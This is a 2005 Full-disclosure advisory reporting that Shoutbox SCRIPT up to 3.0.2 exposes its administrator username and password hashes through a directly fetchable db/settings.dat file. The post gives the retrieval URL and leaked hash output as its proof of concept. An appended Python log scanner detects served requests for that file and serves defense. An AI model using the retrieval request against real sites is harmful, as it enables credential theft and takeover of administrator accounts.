[Full-disclosure] Shoutbox SCRIPT <= 3.0.2 Administrative MD5 Username and Password Retrieval

From: CorryL (corryl_at_sitoverde.com)
Date: 04/19/05

  • Next message: Paul Kurczaba: "Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit"
    To: <full-disclosure@lists.grok.org.uk>
    Date: Tue, 19 Apr 2005 23:16:14 +0200
    
    

    -=[--------------------ADVISORY-------------------]=-
    -=[                                               ]=-
    -=[ Shoutbox SCRIPT <= 3.0.2                      ]=-
    -=[                                               ]=-
    -=[ Author: CorryL www.x0n3-h4ck.org              ]=-
    -=[                                               ]=-
    -=[-----------------------------------------------]=-

    -=[+] Application: Shoutbox SCRIPT
    -=[+] Version: 3.0.2 and prior
    -=[+] Vendor's URL: http://www.knusperleicht.at
    -=[+] Platform: Windows\Linux\Unix
    -=[+] Bug type: Administrative MD5 Username and Password Retrieval
    -=[+] Exploitation: Remote/Local
    -=[-]
    -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
    -=[+] Reference: www.x0n3-h4ck.org ~ irc.xoned.net #x0n3-h4ck

    ..::[ Description ]::..

    Shoutbox is a PHP script that is very simple to install and use.
    It serves as a showcase where users can leave their own
    messages.

    ..::[ Bug ]::..

    This software is affected by a bug:
    a remote attacker can exploit it
    to retrieve sensitive information, namely the administrator username
    and password as MD5 hashes.

    ..::[ Proof Of Concept ]::..

    http://host/path to shout/db/settings.dat

    result:

    .....
    ....
    ....
    $SB_ADMIN[Change_Username] = '189bbbb00c5f1fb7fba9ad9285f193d1';
    $SB_ADMIN[Change_Userpass] = '81dc9bdb52d04dc20036dbd8313ed055';

    ..::[ Workaround ]::..

    nothing

    ..::[ Disclosure Timeline ]::..

    [17/04/2005] - Vendor notification
    [19/04/2005] - No patch release from vendor
    [19/04/2005] - Public disclosure

    CorryL
    corryl80@gmail.com
    www.x0n3-h4ck.org
    Italian Security Team
    Fax (+39) 02700520894
    Tel (+39) 06452215277
    irc.xoned.net #x0n3-h4ck

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
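
A defender-side check for the exposure described in this advisory, added here as an example and not part of CorryL's post: it scans web-server access logs for requests where `db/settings.dat` was actually served. The combined log format, the `/shout/` install path and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Common/combined log format: ip - user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Path from the advisory; the install directory in front of it varies.
SENSITIVE_SUFFIX = "/db/settings.dat"
# Statuses meaning the file body was delivered (304: client already held a copy).
SERVED = {200, 206, 304}


def normalise(target):
    """Drop the query string, decode percent-escapes, collapse slashes, lowercase."""
    path = unquote(urlsplit(target).path)
    return re.sub(r"/{2,}", "/", path).lower()


def find_settings_reads(lines):
    """Return (ip, time, path, status) for each served request of settings.dat."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        path = normalise(m.group("target"))
        status = int(m.group("status"))
        if path.endswith(SENSITIVE_SUFFIX) and status in SERVED:
            hits.append((m.group("ip"), m.group("time"), path, status))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Apr/2005:23:20:01 +0200] "GET /shout/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [19/Apr/2005:23:21:44 +0200] "GET /shout/db/settings.dat HTTP/1.1" 200 812',
    '198.51.100.7 - - [19/Apr/2005:23:21:50 +0200] "GET /shout/DB/settings%2Edat?x=1 HTTP/1.1" 200 812',
    '203.0.113.5 - - [19/Apr/2005:23:25:12 +0200] "GET /shout/db/settings.dat HTTP/1.1" 403 199',
    '192.0.2.10 - - [19/Apr/2005:23:26:00 +0200] "GET /shout/db/settings.dat.bak HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in find_settings_reads(SAMPLE_LOG):
        print(hit)
```

Any hit means the stored administrator hashes should be treated as disclosed and the credentials changed; the 403 line shows what the log looks like once direct access to the file is denied.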

